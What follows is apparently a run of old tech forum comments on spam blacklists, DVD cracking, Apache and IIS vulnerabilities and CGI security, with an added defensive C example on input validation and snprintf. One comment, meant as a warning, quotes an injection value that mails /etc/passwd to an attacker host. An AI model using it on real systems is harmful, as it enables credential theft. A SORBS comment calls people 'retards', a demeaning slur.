I agree, SORBS are completely retarded. More specifically, the SORBS-DUHL list - it may say it shouldn't be used as a SPAM blocking list but people still use it for that. My work has a static IP address (business DSL) and we got on the dynamic IP address list - trying to get off is impossible, even after getting our ISP to change the TTL for the DNS records, and various other steps.
Our personal impression at work is that SORBS is run by retards who like to feel important by getting major ISPs to work with them. I strongly recommend not using any of their lists, and using more effective SPAM filtering techniques. I could go on and on but if anyone doubts this just do a search for SORBS problems.
There are apps that only run on Macs that we x86 users want (like Emagic's Logic Audio, which used to exist for PC but now is only on Mac). The only problem is apps like this need to run as fast as possible, so this probably wouldn't really be helpful.
I d/l'd this and have been playing with it; it seems pretty cool so far. The one thing I can say though is that the sample app it comes with (SimpleApp.java) has some of the worst formatting I've ever seen - you'd think IBM would clean it up a bit before selling it to people as a reference app...
That being said, this will be great if you want to make an open source Java app and don't want to require end users to have a particular DB installed (and don't want them to have to create tables, etc.).
> This is why they are the top resource for security people online, and why amateur offerings like BugTraq don't get the same recognition from serious organisations
Top resource for security people online? WTF are you talking about? If security people only followed CERT they'd be rooted in the first 2 months it takes CERT to post an advisory. Bugtraq is the top resource, or one of them, for security people who are competent enough to figure out whether or not an exploit or possible bug applies to them.
If your box is already cracked, then it won't help. But it will help people keep their daemons up to date. If every Linux distro automatically checked for updates, even if only for daemons and setuid programs, think of how many fewer old copies of Bind there would be out there.
If you run Debian, you can just run apt-get upgrade and get the newest packages whenever you'd like. If one were so inclined, a cron job could run it every night, or once a week, and as long as Debian keeps up with the newest vulnerabilities you'll be ok.
The main reason this code (DeCSS) is important is that it helps with writing DVD software for Linux. And to the person who said blame the people who wrote the standards for allowing it to be cracked: as long as there are software players for any standard it will be crackable, without a doubt. For more information see http://www.counterpane.com/crypto-gram-9911.html#DVDEncryptionBroken on why you will never have secure software.
Appendix A is "Portability". Mentions different sizes of int and others on different systems, byte order, etc.
theyd have to redesign a whole new mail system (on: UN Proposes Email Tax)
How would one tax using SMTP anyway? It would either have to be a whole new protocol, or an add-on to SMTP or ESMTP. Plus then there's all the bugs that would appear, and people's accounts being charged for emails they never sent because the script kiddies would find some way to abuse it. Plus if that did happen, people would probably set up "rogue" free SMTP and POP servers. Taxing email just wouldn't work out, IMHO.
http://fravia.org (which seems to be down half the time) is all about reverse engineering (cracking). It isn't just a simple how-to-crack (software crack, not bad "hacker") site; he really is interested in reverse engineering. There are even pages about Linux cracking. If his site is down just search for +HCU or +ORC along with +fravia. When I was into that type of stuff, before I got into Linux, I used w32dsm, of which there are shareware versions, but just as I stopped doing that IDA became really big. IDA seems to be better, but W32dsm worked well. And for a Windows debugger, you can't beat SoftICE, by Numega. No other debugger for Windows even comes close.
It used to be www.genocide2600.com/~tattooman/, why can't it just go back there? It sure didn't last very long at Harvard; did the new file part ever get working?
The last bug I remember in Apache was flooding it with lots of headers, which was fixed right away. I don't remember a buffer overflow ever being in Apache; there might have been one but that would have been a long time ago. Now IIS 4.0 has a buffer overflow that www.eEye.com found, which gives remote users system access. So assuming you had a Mindcraft survey type machine (4 CPUs, huge bandwidth, lots of RAM), now some script kiddie can use that to crack passwd files, or since NT does threading so well, make a threaded port scanner and scan entire Class A's for the newest exploits. It's hard to believe with how big M$ is they still have a new buffer overflow in one of their programs every 2 weeks. I mean, how hard is it to use snprintf instead of sprintf? M$ could even afford to hire someone full time just to grep for sprintf in any program that uses the internet. Personally, I'd rather just be able to serve 100 million hits a day or whatever it was and not have people getting root on my server constantly.
They don't mention long term effects; maybe the mice get cancer and die 1 year later. Besides, wouldn't that amount of caffeine if given by weight affect most humans pretty badly?
One of the previous posters said he pays $50 a month for DSL. Now I know the cost varies depending on what speed you choose, but are there any other (hidden) fees? I'm assuming you probably have to pay for the equipment, or at least lease one from them, but are there also fees for using the phone line or anything like that? I thought ISDN users had to pay for the line along with their monthly fees...
Well first off I personally would never run any of the R*services; it seems like there is a new remote root exploit for one of them every month. As for SSH, that seems to be what everyone recommends here, but wasn't that how rootshell (the script kiddie 31337 site) got hacked, through a bug in SSH? And as for CGI programming, always keep things in mind like what if someone passed ";" in their arguments to the script. I.e.: you call mail %1 and the arguments are " a@aol.com ; mail -s passwd evil@hax0r.org /etc/passwd". Of course that's also a good reason to use shadowed passwords. Oh yeah, and if you do any programming for the server please never use sprintf or related functions. Reading BUGTRAQ would be helpful too - if you don't want to subscribe just go to http://www.geek-girl.com/bugtraq/
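The two habits the comment above argues for (and the earlier comment about grepping for sprintf) can be shown together in a few lines of C. This is an added defensive example, not code from any of the posters: it validates a CGI-supplied recipient so shell metacharacters like ";" never reach a shell, builds the command string with snprintf and checks the return value for truncation, and invokes mail(1) through an argv array with execvp rather than through system(). The function names, the whitelist of allowed characters, and the assumption that a mail(1) binary exists are all mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example (not from the original comments). Names and the character
 * whitelist below are assumptions chosen for illustration. */

/* Accept only a plausible mailbox: letters, digits, a few punctuation
 * characters, and exactly one '@'. Shell metacharacters such as ';', '|',
 * '`', '$', spaces and quotes are rejected, so the injection string quoted
 * in the comment above never gets anywhere near a shell. */
int is_safe_recipient(const char *addr)
{
    size_t n = strlen(addr);
    int at_count = 0;
    if (n == 0 || n > 254) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (isalnum(c) || c == '.' || c == '-' || c == '_' || c == '+') continue;
        if (c == '@') { at_count++; continue; }
        return 0;
    }
    return at_count == 1;
}

/* Bounded formatting: snprintf never writes past bufsize, and its return
 * value is the length it *wanted*, so a value >= bufsize means the output
 * was truncated. Returns 1 on success, 0 (and an empty buffer) on truncation.
 * This is the check that makes "use snprintf instead of sprintf" actually safe. */
int format_mail_command(char *buf, size_t bufsize, const char *addr)
{
    int needed = snprintf(buf, bufsize, "mail %s", addr);
    if (needed < 0 || (size_t)needed >= bufsize) {
        if (bufsize > 0) buf[0] = '\0';
        return 0;
    }
    return 1;
}

/* Deliver via mail(1) without a shell: the recipient is a single argv
 * element, so even an unvalidated ';' would be a literal argument, not a
 * command separator. Returns the child's exit status, or -1 on invalid
 * input or a fork/pipe failure. Assumes mail(1) is on PATH. */
int send_mail_safely(const char *addr, const char *body)
{
    if (!is_safe_recipient(addr)) return -1;
    int pipefd[2];
    if (pipe(pipefd) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        dup2(pipefd[0], STDIN_FILENO);   /* body arrives on stdin */
        close(pipefd[0]);
        close(pipefd[1]);
        char *const argv[] = { "mail", (char *)addr, NULL };
        execvp("mail", argv);
        _exit(127);                      /* exec failed */
    }
    close(pipefd[0]);
    if (write(pipefd[1], body, strlen(body)) < 0) { /* ignore: child still reaps */ }
    close(pipefd[1]);
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Stand-alone demo: exercises the validator and the bounded formatter
 * without actually sending mail. */
int main(void)
{
    const char *good = "a@aol.com";                                    /* constructed input */
    const char *bad  = "a@aol.com ; mail -s passwd evil@hax0r.org /etc/passwd"; /* from the comment */
    char buf[16];
    printf("%s -> %s\n", good, is_safe_recipient(good) ? "accepted" : "rejected");
    printf("%s -> %s\n", bad,  is_safe_recipient(bad)  ? "accepted" : "rejected");
    printf("format fits: %d (%s)\n", format_mail_command(buf, sizeof buf, good), buf);
    printf("format fits: %d\n", format_mail_command(buf, sizeof buf, "averylongaddress@example.com"));
    return 0;
}
```

The validator is a whitelist, not a blacklist of known-bad characters; rejecting everything not explicitly allowed is what keeps the next metacharacter you forgot about from mattering. The execvp path is the real fix, since it removes the shell from the picture entirely; the whitelist is defence in depth for whatever the recipient string is later used for (log lines, headers).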
http://www.unix-vs-nt.org/ is the site that talks about M$ moving to NT, then having to go back to Solaris.
By "latest 2.0.3 version of apache", are they implying Apache 2.0.3? I thought the highest was 1.3.6?